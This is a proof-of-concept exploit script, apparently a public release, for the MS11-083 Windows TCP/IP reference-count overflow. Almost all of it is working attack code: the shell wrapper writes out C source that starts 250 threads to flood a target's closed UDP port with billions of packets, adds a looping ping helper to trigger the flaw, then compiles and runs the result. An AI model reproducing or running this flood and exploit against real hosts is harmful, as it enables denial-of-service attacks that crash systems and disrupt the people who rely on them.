MS11-083 PoC winnuke2011.sh

1. #!/bin/sh
2. cat >> winnuke2011.c << EOF
3. /*
4. * MS11-083 DoS/PoC exploit
5. * ========================
6. * This attempts to trigger the ICMP refCount overflow  
7. * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
8. * requires sending 2^32 UDP packets to a host on a closed
9. * port, or 4,294,967,296 packets. A dereference function
10. * must be called that is not triggered via UDP but ICMP  
11. * echo packets. This exploit creates 250 threads and
12. * floods a host with UDP packets and then attempts to
13. * trigger the de-ref using ping. I calculated that it
14. * would take approximately 52 days for the host to
15. * enter a condition where this vulnerability is
16. * triggerable.
17. *
18. * -- prdelka
19. */
20. #include <stdio.h>
21. #include <stdlib.h>
22. #include <pthread.h>
23. #include <sys/types.h>
24. #include <sys/socket.h>
25. #include <netinet/in.h>
26. #include <arpa/inet.h>
27. #include <netdb.h>
28. #include <stdio.h>
29. #include <unistd.h>
30. #include <string.h>
31. #include <sys/time.h>
32.  
33. int port;
34. int active = 0;
35. pthread_mutex_t mutexactive;
36. void *sendpackets(void *ptr);
37.  
38. int main(int argc, char *argv[]) {
39.         pthread_t thread;
40.         int iret,lthreads;
41.     pid_t pid;
42.     printf("[+] MS11-083 DoS/PoC exploit\n");
43.     if(argc<3){
44.         printf("[!] Usage : %s <server> <port>\n", argv[0]);
45.         exit(1);
46.     }
47.     char *const args[] = {"ping",argv[1],NULL};
48.     char *const envp[] = {"",NULL};
49.     port = atoi(argv[2]);
50.     for(lthreads=0;lthreads<250;lthreads++){//UDP flood
51.         iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
52.         printf("[-] Thread number %d started\n",lthreads);
53.         sleep(1);
54.     }
55.     printf("[-] One does not simply barrel roll into Mordor\n");
56.     pid = fork();
57.     if(pid==0){// trigger deref.
58.         execve("./ping.sh",args,envp);
59.     };
60.     while(active){
61.     }
62.     printf("[-] You are finished. Patience is a virtue.\n");
63.     exit(0);
64. }
65.  
66. void *sendpackets(void *ptr)
67. {
68.     int sd, rc, n, echoLen, flags, error, timeOut;
69.     unsigned long i;
70.     struct sockaddr_in remoteServAddr;
71.     struct hostent *h;
72.     char str[41];
73.     pthread_mutex_lock(&mutexactive);
74.     active++;
75.     pthread_mutex_unlock(&mutexactive);
76.     srand(time(NULL));
77.     for (i = 0;i < 40;++i){
78.         str[i] = (char)((rand() % 78) + 30);
79.     }
80.     str[40] = '\0'; // yes this was off-by-one. :(
81.     printf("[-] Sending payload '%s'\n",str);
82.     h = gethostbyname(ptr);
83.     if(h==NULL) {
84.             printf("unknown host '%s' \n",(char*)ptr);
85.             exit(1);
86.     }
87.     remoteServAddr.sin_family = h->h_addrtype;
88.     memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
89.     remoteServAddr.sin_port = htons(port);
90.     sd = socket(AF_INET,SOCK_DGRAM,0);
91.     if(sd<0){
92.         printf("[!] Cannot open socket\n");
93.         pthread_exit((void*)0);
94.     }
95.     flags = 0;
96.     for(i=0;i<4294967295;i++){
97.         rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
98.         if(rc<0){
99.             printf("[!] Cannot send data\n");
100.                 close(sd);
101.             pthread_exit((void*)0);
102.             }
103.     }
104.     pthread_mutex_lock(&mutexactive);
105.     active--;
106.     pthread_mutex_unlock(&mutexactive);
107.     pthread_exit(NULL);
108. }
109. EOF
110. cat >> ping.sh << EOF
111. #!/bin/sh
112. while \`true\`;do /sbin/ping -c 1 \$1;done
113. EOF
114. chmod +x ping.sh
115. gcc winnuke2011.c -o winnuke2011
116. ./winnuke2011
117.  
118.